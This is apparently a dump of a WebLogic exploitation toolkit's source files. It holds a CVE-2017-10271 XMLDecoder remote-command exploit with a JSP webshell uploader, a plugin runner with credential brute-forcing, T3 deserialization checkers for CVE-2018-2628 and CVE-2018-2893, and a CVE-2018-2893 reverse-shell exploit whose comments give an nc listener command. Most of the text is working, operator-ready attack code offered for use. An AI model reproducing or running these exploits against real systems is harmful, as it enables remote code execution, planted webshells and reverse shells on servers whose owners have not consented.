    if len(sys.argv) == 1:
        sys.argv.append('-h')
    args = parser.parse_args()
    target = args.target

    target = target.rstrip('/')
    if "://" not in target:
        target = "http://" + target
    try:
        upload_webshell(target, url)
    except Exception as e:
        print("[-] Error: \n")
        traceback.print_exc()
--------------------------------------------------------------------------------
/plugins/weblogic_exp/CVE_2017_10271_linux.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # _*_ coding:utf-8 _*_
3 | '''
4 | ____ _ _ _ _ __ __ _
5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __
6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ <
8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\
9 |
10 | '''
11 | import requests
12 | import argparse
13 | import time
14 | import base64
# Default outbound proxy (a local interception proxy such as Burp);
# ``main`` resets this to None unless --proxy is given.
proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}
# User-Agent for the output fetch; the payload POST sets its own headers.
headers = {'User-Agent':'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'}
# Per-request timeout in seconds.
timeout = 5
18 | '''
19 | payload的格式化
20 | '''
21 | def payload_command(command_in,output_file,os):
22 | html_escape_table = {
23 | "&": "&",
24 | '"': """,
25 | "'": "'",
26 | ">": ">",
27 | "<": "<",
28 | }
29 | #命令执行回显:将命令执行的结果输出到文件中
30 | #command_in_payload = 'find . -name index.html| while read path_file;do {} >$(dirname $path_file)/{};done'.format(command_in,output_file)
31 | command_in_payload = '{} > ./servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/{}'.format(command_in,output_file)
32 | command_filtered = ""+"".join(html_escape_table.get(c, c) for c in command_in_payload)+""
33 | #XMLDecoder反序列化payload:
34 | cmd_app = '/bin/sh' if os == 'linux' else 'cmd.exe'
35 | cmd_param = '-c' if os == 'linux' else '/c'
36 |
37 | payload_1 = " \n" \
38 | " " \
39 | " \n" \
40 | " \n" \
41 | " \n" \
42 | " " \
43 | " " \
44 | " {} " \
45 | " " \
46 | " " \
47 | " {} " \
48 | " " \
49 | " ".format(cmd_app,cmd_param) \
50 | + command_filtered + \
51 | " " \
52 | " " \
53 | " " \
54 | " " \
55 | " " \
56 | " " \
57 | " " \
58 | " " \
59 | ""
60 | return payload_1
61 |
62 | '''
63 | 得到命令执行的回显结果
64 | '''
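def get_output(target, output_file):
    """Fetch the command output that the payload redirected into
    ``bea_wls_internal/<output_file>`` on the target.

    Args:
        target: host[:port] or full URL; ``http://`` is prepended when no scheme.
        output_file: file name the payload wrote into.

    Returns:
        ``(True, body)`` on HTTP 200 (body stripped); ``(False, reason)``
        otherwise.  ``reason`` is a str for 404 and exceptions but the raw
        integer status code for any other response (kept as callers expect).
    """
    if not target.startswith('http'):
        target = 'http://{}'.format(target)
    # Cache-buster: a fresh query string per call so neither a proxy nor the
    # server can hand back the previous command's output.
    output_url = '{}/bea_wls_internal/{}?{}'.format(target, output_file, int(time.time()))
    try:
        r = requests.get(output_url, headers=headers, proxies=proxies,
                         timeout=timeout, verify=False)
        if r.status_code == requests.codes.ok:
            return (True, r.text.strip())
        elif r.status_code == 404:
            return (False, '404 no output')
        else:
            return (False, r.status_code)
    except Exception as ex:
        # FIX: ``except Exception, ex`` is Python 2-only syntax; ``as`` works on both.
        return (False, str(ex))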
81 |
82 | '''
83 | RCE
84 | '''
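def weblogic_rce(target, cmd, output_file, os='linux'):
    """Send the XMLDecoder payload to ``/wls-wsat/CoordinatorPortType`` and,
    when the server answers 500, fetch the redirected command output.

    Args:
        target: host[:port] or URL; ``http://`` is prepended when no scheme.
        cmd: shell command to run on the target.
        output_file: file name (under bea_wls_internal) the output is written to.
        os: 'linux' or 'win'; selects ``/bin/sh -c`` or ``cmd.exe /c`` in the payload.

    Returns:
        ``(True, output)`` or ``(False, reason)`` with a human-readable reason.
    """
    if not target.startswith('http'):
        target = 'http://{}'.format(target)
    url = '{}/wls-wsat/CoordinatorPortType'.format(target)
    # The endpoint only parses the body when Content-Type is text/xml.
    payload_header = {'content-type': 'text/xml',
                      'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'}
    try:
        r = requests.post(url, payload_command(cmd, output_file, os), headers=payload_header,
                          verify=False, timeout=timeout, proxies=proxies)
    except requests.exceptions.ReadTimeout:
        return (False, 'timeout')
    except Exception as ex:
        # FIX: ``except Exception, ex`` is Python 2-only syntax; ``as`` works on both.
        return (False, str(ex))
    # A 500 is what the server returns once the XML has been deserialised
    # (the body is not a valid SOAP request); the command ran as a side
    # effect.  The read-back below is the actual proof, not the 500 alone.
    if r.status_code == 500:
        # Give the redirected command a moment to finish writing its output.
        time.sleep(1)
        return get_output(target, output_file)
    if r.status_code == 404:
        return (False, '404 no vulnerability')
    return (False, '{} something went wrong'.format(r.status_code))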
108 |
109 | '''
110 | getshell
111 | '''
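def weblogic_getshell(target, output_file, shell_file, os='linux'):
    """Upload a local file (typically a JSP) by piping its base64 through
    ``base64 -d`` on the target into ``bea_wls_internal/<output_file>``.

    Args:
        target: host[:port] or URL.
        output_file: name to write on the target (use a .jsp name for a shell).
        shell_file: local path of the file to upload.
        os: passed through to ``weblogic_rce``; note that ``echo | base64 -d``
            is itself a Unix pipeline, so only the 'linux' path can work.

    Returns:
        The ``(status, result)`` tuple from ``weblogic_rce``; on success the
        shell URL is also printed.

    Operator note: this writes an executable artefact into the target's web
    root; record the path for cleanup.
    """
    if not target.startswith('http'):
        target = 'http://{}'.format(target)
    # FIX: read bytes -- b64encode rejects str on Python 3 -- and decode the
    # ASCII result so it formats into the command on either version.
    with open(shell_file, 'rb') as f:
        encoded = base64.b64encode(f.read()).decode('ascii')
    # The whole file travels on the command line; very large files may hit
    # the target's argument-length limit.
    cmd = 'echo {}|base64 -d'.format(encoded)
    status, result = weblogic_rce(target, cmd, output_file, os)
    if status:
        print('[+]shell-> {}/bea_wls_internal/{}'.format(target, output_file))
    return (status, result)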
121 | '''
122 | main
123 | '''
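def main():
    """CLI entry point: parse arguments, optionally drop the default local
    proxy, run either a command or a shell upload, and print the outcome."""
    global proxies

    parse = argparse.ArgumentParser()
    parse.add_argument('-t', '--target', required=True, help='weblogic ip and port(eg -> 172.16.80.131:7001 or https://172.16.80.131)')
    parse.add_argument('-c', '--cmd', required=False, default='id', help='command to execute,default is "id"')
    parse.add_argument('-o', '--output', required=False, default='output.txt', help='output file name,default is output.txt')
    parse.add_argument('-s', '--shell', required=False, default='', help='local jsp file name to upload,and set -o xxx.jsp')
    parse.add_argument('--os', choices=['linux', 'win'], default='linux', help='host os:linux or win,default is linux')
    parse.add_argument('--proxy', action='store_true', default=False, help='use proxy')
    args = parse.parse_args()

    # --proxy keeps the module-level 127.0.0.1:8080 proxies; otherwise go direct.
    if not args.proxy:
        proxies = None
    if args.shell != '':
        status, result = weblogic_getshell(args.target, args.output, args.shell, args.os)
    else:
        status, result = weblogic_rce(args.target, args.cmd, args.output, args.os)
    # FIX: print statements were Python 2-only; the call form runs on both.
    if status:
        print(result)
    else:
        print('[-]FAIL:{}'.format(result))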
148 |
# Script entry point: only run the CLI when executed directly, not on import.
if __name__ == '__main__':
    main()
151 |
--------------------------------------------------------------------------------
/plugins/plugins.py:
--------------------------------------------------------------------------------
1 | #coding=utf-8
2 | import sys
3 | import requests
4 | import os
5 | import json
6 | import traceback
7 | from concurrent.futures import ThreadPoolExecutor
8 | from plugins.special_plugin_ import special_plugin_
9 | sys.path.append("plugins")
10 | import plugins
11 | current_file=os.path.dirname(os.path.abspath(__file__))
12 | from user_agent import get_user_agent
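class plugins(object):
    """Driver for the "standard" POC plugins.

    Every ``*_plugin.py`` module in this directory exposes a ``pocs`` list of
    dicts; the keys read here are ``url`` (list of paths), ``requests_option``
    ("GET"/"POST"), ``params``, ``data``, ``flag`` (response markers),
    ``success``, ``fail``, ``end``, ``admin_bursk``, ``username`` and
    ``password``.  ``run`` loads each module, picks the product's default
    port, checks every poc against ``arg.url`` and finally hands over to
    ``special_plugin_``.  Hits are collected in ``self.vuln`` (list.append is
    atomic under the GIL, so worker threads may append concurrently).
    """

    # Products served on 8080 by default; weblogic gets 7001; anything else
    # keeps ``config.port``.  (The original mutated ``self.port`` inside the
    # module loop, so a previous module's port leaked into unrelated ones.)
    _PORT_8080 = ("axis", "glassfish", "jboss", "resin", "spring", "tomcat", "struts2")
    # A request that raised is re-issued while the counter stays <= this.
    _MAX_RETRIES = 2

    def __init__(self, arg, config):
        self.arg = arg
        self.config = config
        self.url = arg.url
        self.options = arg.options
        self.ThreadNum = config.ThreadNum
        self.Timeout = config.Timeout
        self.vuln = []
        self.port = config.port

    @staticmethod
    def _strip_suffix(name, suffix):
        """Drop ``suffix`` from the end of ``name`` when present (exact match).

        FIX: the original used ``rstrip(".py")`` / ``strip("_plugin")``, which
        strip any run of those *characters*: ``"glassfish_plugin".strip("_plugin")``
        is ``"assfish"`` and ``"resin_plugin".strip("_plugin")`` is ``"res"``,
        so those products never matched the port table.
        """
        if suffix and name.endswith(suffix):
            return name[:-len(suffix)]
        return name

    @staticmethod
    def _is_bruteforce(poc):
        """True for credential-guessing pocs.  ``admin_bursk`` is spelled both
        as the bool ``True`` and the string ``"True"`` in this file's callers,
        so both are accepted."""
        return poc.get("admin_bursk") in (True, "True")

    def _port_for(self, product):
        """Default port for a product name (see ``_PORT_8080``)."""
        if product in self._PORT_8080:
            return 8080
        if product == "weblogic":
            return 7001
        return self.port

    def run(self):
        """Load every ``*_plugin.py``, check its pocs on worker threads, print
        the collected hits, then run the special plugins."""
        print("\n第一部分standard_poc 测试开始:")
        print("***********************")
        with ThreadPoolExecutor(self.ThreadNum) as executor:
            for filename in os.listdir(current_file):
                if "_plugin.py" not in filename:
                    continue
                module = self._strip_suffix(filename, ".py")
                pocs = __import__(module).pocs
                port = self._port_for(self._strip_suffix(module, "_plugin"))
                # FIX: ``submit(self.check(pocs))`` ran check() inline and then
                # submitted its None result.  The port is passed as an argument
                # so a later loop iteration cannot change it under the worker.
                executor.submit(self.check, pocs, port)
        # Leaving the ``with`` block waits for every worker before reporting.
        if self.vuln:
            print("\n\n\n第一部分 standard_poc 测试出的漏洞有:")
            for vuln in self.vuln:
                print(vuln)
        else:
            print("\n\n\n第一部分 standard_poc 没有测试出任何的漏洞。")
        print("\n\n\n第二部分:\n开始测试特定的poc脚本:")
        print("***********************")
        special_plugin_(self.arg, self.config)

    def request_get(self, url, params, data, flags, success_num, success, fail, pocs):
        """Issue one GET against the complete ``url`` and record a hit.

        With an empty ``flags`` list any non-404 answer counts; otherwise at
        least one marker must appear in the body.  On a transport error the
        request is retried (``success_num`` doubles as the retry counter, as
        in the original) up to ``_MAX_RETRIES`` times.  ``data`` and ``fail``
        are accepted for signature compatibility but unused.  The port is
        applied by ``check``; this method no longer appends it.
        """
        try:
            # FIX: requests expects a mapping; the original passed the bare
            # user-agent string as ``headers``.
            headers = {'User-Agent': get_user_agent()}
            s = requests.get(url=url, params=params, headers=headers, timeout=self.Timeout)
        except Exception:
            success_num = success_num + 1
            if success_num <= self._MAX_RETRIES:
                self.request_get(url, params, data, flags, success_num, success, fail, pocs)
            return
        if not flags:
            if s.status_code != 404:
                self.vuln.append(self.url + success)
            return
        success_num = success_num + sum(1 for flag in flags if flag in s.text)
        if success_num > 0:
            # FIX: ``pocs`` is the poc dict; concatenating it to a str raised TypeError.
            line = success + " \npocs: \n" + str(pocs)
            self.vuln.append(line)
            print(line)

    def request_post(self, url, params, data, flag, success_num, username, password, success, fail, pocs):
        """Issue one POST of ``data`` against the complete ``url`` and record
        a hit when any marker in ``flag`` appears in the body.

        Brute-force pocs report the ``username``/``password`` pair; others
        report the poc itself.  Transport errors are retried like in
        ``request_get``.  ``params`` and ``fail`` are unused.

        NOTE(review): the credentials are only *reported* -- nothing here
        substitutes them into ``data``; confirm the plugin data templates
        already carry them.
        """
        try:
            headers = {'User-Agent': get_user_agent()}
            s = requests.post(url=url, data=data, headers=headers, timeout=self.Timeout)
        except Exception:
            success_num = success_num + 1
            if success_num <= self._MAX_RETRIES:
                self.request_post(url, params, data, flag, success_num, username, password, success, fail, pocs)
            return
        # FIX: the original looped over ``poc["flag"]`` with ``poc`` undefined
        # (NameError on every call, swallowed by the except and retried twice).
        success_num = success_num + sum(1 for marker in flag if marker in s.text)
        if success_num > 0:
            if self._is_bruteforce(pocs):
                # FIX: ``utl`` was an undefined name in the original.
                creds = ",username:%s password:%s" % (username, password)
                line = "success url:" + url + " " + success + creds
            else:
                line = success + " \n pocs: \n" + str(pocs)
            self.vuln.append(line)
            print(line)

    def _submit_get(self, executor, url, poc):
        """Queue one GET per entry of ``poc["params"]`` (a single placeholder
        value when the list is empty, as the original did -- without mutating
        the shared poc dict)."""
        params_list = poc["params"] if poc["params"] else ["seize"]
        for params in params_list:
            # FIX: submit the callable, not its (None) return value.
            executor.submit(self.request_get, url, params, poc["data"], poc["flag"], 0,
                            poc["success"], poc["fail"], poc)

    def _submit_post(self, executor, url, poc):
        """Queue the POSTs for one poc: every username/password pair per data
        entry for brute-force pocs, otherwise one request per data entry.

        FIX: the original's non-brute-force branch re-looped ``poc["data"]``
        inside the outer data loop, sending each body len(data) times.
        """
        data_list = poc["data"] if poc["data"] else ["seize"]
        for data in data_list:
            if self._is_bruteforce(poc):
                for username in poc["username"]:
                    for password in poc["password"]:
                        executor.submit(self.request_post, url, poc["params"], data, poc["flag"], 0,
                                        username, password, poc["success"], poc["fail"], poc)
            else:
                executor.submit(self.request_post, url, poc["params"], data, poc["flag"], 0,
                                poc["username"], poc["password"], poc["success"], poc["fail"], poc)

    def check(self, pocs, port=None):
        """Run every poc in ``pocs`` against ``self.url`` on ``port`` (defaults
        to ``self.port``), one request per worker thread.

        NOTE(review): the URL is built as ``<self.url>:<port><path>``, which
        assumes ``arg.url`` is scheme://host without a port of its own -- confirm.
        """
        if port is None:
            port = self.port
        with ThreadPoolExecutor(self.ThreadNum) as executor:
            for poc in pocs:
                for path in poc["url"]:
                    try:
                        # FIX: the port belongs on the authority; the original
                        # appended it after the path (``host/path:8080``) and
                        # raised TypeError whenever the port was an int.
                        url = "{}:{}{}".format(self.url, port, path)
                        option = poc["requests_option"]
                        if option == "GET":
                            self._submit_get(executor, url, poc)
                        if option == "POST":
                            self._submit_post(executor, url, poc)
                    except Exception:
                        # FIX: ``print(traceback.print_exc())`` printed a stray None.
                        traceback.print_exc()
                if poc["end"]:
                    if "/" in poc["end"]:
                        print(self.url + poc["end"])
                    else:
                        print(self.url + " " + poc["end"])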
131 |
--------------------------------------------------------------------------------
/plugins/weblogic_poc/CVE_2018_2628.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # _*_ coding:utf-8 _*_
3 | '''
4 | ____ _ _ _ _ __ __ _
5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __
6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ <
8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\
9 |
10 | '''
import binascii
import re
import socket
import sys
import time
15 |
16 |
17 | VUL=['CVE-2018-2628']
18 | PAYLOAD=['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']
19 | VER_SIG=['\\$Proxy[0-9]+']
20 |
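def t3handshake(sock, server_addr):
    """Connect to the T3 listener and send the protocol greeting.

    The hex below decodes to ``"t3 12.2.1\\nAS:255\\nHL:19\\nMS:10000000\\n\\n"``.
    The server's reply is read and discarded; it is not validated.

    Args:
        sock: an unconnected TCP socket.
        server_addr: ``(host, port)`` tuple.
    """
    sock.connect(server_addr)
    sock.settimeout(6)
    # FIX: ``str.decode('hex')`` is Python 2-only; unhexlify works on both.
    # sendall loops until the whole greeting is written (send may be short).
    sock.sendall(binascii.unhexlify('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'))
    time.sleep(1)
    sock.recv(1024)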
28 |
29 | def buildT3RequestObject(sock,dport):
30 | data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e566572
73696f6e496e666f972245516452463e0200035b00087061636b6167657371'
31 | data2 = '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{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(dport))
32 | data3 = '1a7727000d3234322e323134'
33 | data4 = '2e312e32353461863d1d0000000078'
34 | for d in [data1,data2,data3,data4]:
35 | sock.send(d.decode('hex'))
36 | time.sleep(2)
37 | # print 'send request payload successful,recv length:%d'%(len(sock.recv(2048)))
38 |
39 |
40 | def sendEvilObjData(sock,data):
41 | payload='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'
42 | payload+=data
43 | payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
44 | payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload)
45 | sock.send(payload.decode('hex'))
46 | time.sleep(2)
47 | sock.send(payload.decode('hex'))
48 | res = ''
49 | try:
50 | while True:
51 | res += sock.recv(4096)
52 | time.sleep(0.1)
53 | except Exception as e:
54 | pass
55 | return res
56 |
def checkVul(res, server_addr, index):
    """Print whether the server's reply ``res`` carries the marker
    ``VER_SIG[index]`` (a regex, matched with DOTALL) for ``VUL[index]``.

    ``server_addr`` is accepted for interface compatibility but not used in
    the output.  Presence of the marker is a heuristic, not proof of
    exploitation.
    """
    hit = re.search(VER_SIG[index], res, re.S) is not None
    if hit:
        print(('[+]目标weblogic存在JAVA反序列化漏洞:{}'.format(VUL[index])))
    else:
        print(('[-]目标weblogic未检测到{}'.format(VUL[index])))
65 |
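def run(dip, dport, index):
    """Check one target for ``VUL[index]``: T3 handshake, request object,
    serialized payload, then signature match on the reply.  Prints the
    result; never raises.  The payload is a serialized Java object sent to
    the T3 port -- use only against systems you are authorised to test.

    Args:
        dip: target host.
        dport: target T3 port.
        index: index into VUL/PAYLOAD/VER_SIG.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        # A patched server blocks instead of answering, so bound every call.
        sock.settimeout(10)
        server_addr = (dip, dport)
        t3handshake(sock, server_addr)
        buildT3RequestObject(sock, dport)
        rs = sendEvilObjData(sock, PAYLOAD[index])
        checkVul(rs, server_addr, index)
    except Exception:
        print("CVE_2018_2628脚本出错")
    finally:
        # FIX: the original never closed the socket on any path.
        sock.close()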
79 |
80 |
# CLI: python CVE_2018_2628.py <host> <port>; no argument validation --
# a missing argument raises IndexError, a non-numeric port ValueError.
if __name__=="__main__":
    dip = sys.argv[1]
    dport = int(sys.argv[2])
    run(dip,dport,0)
--------------------------------------------------------------------------------
/plugins/weblogic_poc/CVE_2018_2893.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # _*_ coding:utf-8 _*_
3 | '''
4 | ____ _ _ _ _ __ __ _
5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __
6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ <
8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\
9 |
10 | '''
import binascii
import re
import socket
import sys
import time
15 |
16 | VUL=['CVE-2018-2893']
17 |
18 |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
19 |
20 | VER_SIG=['StreamMessageImpl']
21 |
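def t3handshake(sock, server_addr):
    """Connect to the T3 listener and send the protocol greeting.

    The hex below decodes to ``"t3 12.2.1\\nAS:255\\nHL:19\\nMS:10000000\\n\\n"``.
    The server's reply is read and discarded; it is not validated.

    Args:
        sock: an unconnected TCP socket.
        server_addr: ``(host, port)`` tuple.
    """
    sock.connect(server_addr)
    sock.settimeout(6)
    # FIX: ``str.decode('hex')`` is Python 2-only; unhexlify works on both.
    # sendall loops until the whole greeting is written (send may be short).
    sock.sendall(binascii.unhexlify('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'))
    time.sleep(1)
    sock.recv(1024)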
28 |
29 |
30 | def buildT3RequestObject(sock,port):
31 | data1 = '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'
32 | data2 = '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{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(port))
33 | data3 = '1a7727000d3234322e323134'
34 | data4 = '2e312e32353461863d1d0000000078'
35 | for d in [data1,data2,data3,data4]:
36 | sock.send(d.decode('hex'))
37 | time.sleep(2)
38 |
39 |
40 |
41 | def sendEvilObjData(sock,data):
42 | payload='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'
43 | payload+=data
44 | payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
45 | payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload)
46 | sock.send(payload.decode('hex'))
47 | time.sleep(2)
48 | sock.send(payload.decode('hex'))
49 | res = ''
50 | try:
51 | while True:
52 | res += sock.recv(4096)
53 | time.sleep(0.1)
54 | except Exception as e:
55 | pass
56 | return res
57 |
def checkVul(res, server_addr, index):
    """Print whether the server's reply ``res`` carries the marker
    ``VER_SIG[index]`` (a regex, matched with DOTALL) for ``VUL[index]``.

    ``server_addr`` is accepted for interface compatibility but not used in
    the output.  Presence of the marker is a heuristic, not proof of
    exploitation.
    """
    hit = re.search(VER_SIG[index], res, re.S) is not None
    if hit:
        print(('[+]目标weblogic存在JAVA反序列化漏洞:{}'.format(VUL[index])))
    else:
        print(('[-]目标weblogic未检测到{}'.format(VUL[index])))
68 |
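def run(dip, dport, index):
    """Check one target for ``VUL[index]``: T3 handshake, request object,
    serialized payload, then signature match on the reply.  Prints the
    result; never raises.  The payload is a serialized Java object sent to
    the T3 port -- use only against systems you are authorised to test.

    Args:
        dip: target host.
        dport: target T3 port.
        index: index into VUL/PAYLOAD/VER_SIG.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        # A patched server blocks instead of answering, so bound every call.
        sock.settimeout(10)
        server_addr = (dip, dport)
        t3handshake(sock, server_addr)
        buildT3RequestObject(sock, dport)
        rs = sendEvilObjData(sock, PAYLOAD[index])
        checkVul(rs, server_addr, index)
    except Exception:
        print("CVE_2018_2893脚本出错")
    finally:
        # FIX: the original never closed the socket on any path.
        sock.close()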
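if __name__ == "__main__":
    # FIX: the argv handling was commented out, leaving 127.0.0.1:7001
    # hard-coded.  Use the command line when given, keep the old default
    # otherwise so existing invocations still work.
    if len(sys.argv) >= 3:
        rip = sys.argv[1]
        rport = int(sys.argv[2])
    else:
        rip = '127.0.0.1'
        rport = 7001
    run(rip, rport, 0)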
--------------------------------------------------------------------------------
/plugins/weblogic_exp/CVE_2018_2893.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # _*_ coding:utf-8 _*_
3 | '''
4 | ____ _ _ _ _ __ __ _
5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __
6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ <
8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\
9 |
10 | '''
import binascii
import os
import socket
import struct
import sys
15 | '''
16 | 可以直接反弹shell
17 | 监听
18 | nc -lvvp reverse_port
19 | 发送payload
20 | python weblogic.py target_host target_port reverse_host reverse_port
21 | '''
22 |
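# Four positional arguments are read below (argv[1..4]).
# FIX: the original tested ``< 4``, which let a three-argument call through
# and crashed on sys.argv[4]; the usage text is taken from the module docstring.
if len(sys.argv) < 5:
    print('Usage: python %s target_host target_port reverse_host reverse_port' % os.path.basename(sys.argv[0]))
    sys.exit()

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)

host = sys.argv[1]
port = int(sys.argv[2])

server_address = (host, port)
print('[+] Connecting to %s port %s' % server_address)
sock.connect(server_address)


# Listener the reverse shell should call back to; encoded into the payload below.
reverse_host = sys.argv[3]
reverse_port = int(sys.argv[4])
# T3 greeting; the PU: line advertises a (fake) peer URL to the server.
headers = 't3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n'
print('sending "%s"' % headers)
# FIX: sockets take bytes on Python 3; on Python 2 str.encode('ascii') is a no-op.
sock.sendall(headers.encode('ascii'))

# Server banner; printed for the operator, not parsed.
data = sock.recv(1024)
sys.stderr.write('received "%s"\n' % data)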
47 |
48 |
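def padhex(s):
    """Strip a leading ``0x`` and left-pad with ``0`` to an even number of
    hex digits, so the string can be decoded as whole bytes.

    FIX: the original used ``s.strip('0x')``, which removes *every* leading
    and trailing ``0``/``x`` character: ``hex(4096)`` (``'0x1000'``) became
    ``'01'``, and a host whose last character hex-encodes to a trailing ``0``
    (e.g. ``'0'`` -> ``30``) lost that digit.

    Args:
        s: hex string, optionally prefixed with ``0x``.

    Returns:
        The hex digits without prefix, even length.
    """
    if s.startswith('0x'):
        s = s[2:]
    if len(s) % 2 != 0:
        return '0' + s
    return s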
55 |
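# Listener host as a one-byte length (as in the original) followed by its
# UTF-8 bytes, and the port as the low 16 bits of the 4-byte int whose
# leading ``0000`` the payload template supplies -- all as lowercase hex.
# FIX: ``hex(n)`` has no fixed width, so ports below 0x100 produced a short
# int field and a corrupt payload; ``str.encode('hex')`` is Python 2-only.
host_hex = '{:02x}'.format(len(reverse_host)) + binascii.hexlify(reverse_host.encode('utf-8')).decode('ascii')
port_hex = '{:04x}'.format(reverse_port)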
58 |
59 |
60 | payloadObj = """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%s737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b02000078700000%s7571007e00210000000271007e002b76720003696e7400000000000000000000007870737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000077080000001000000000787878"""%(host_hex,port_hex)
61 |
62 |
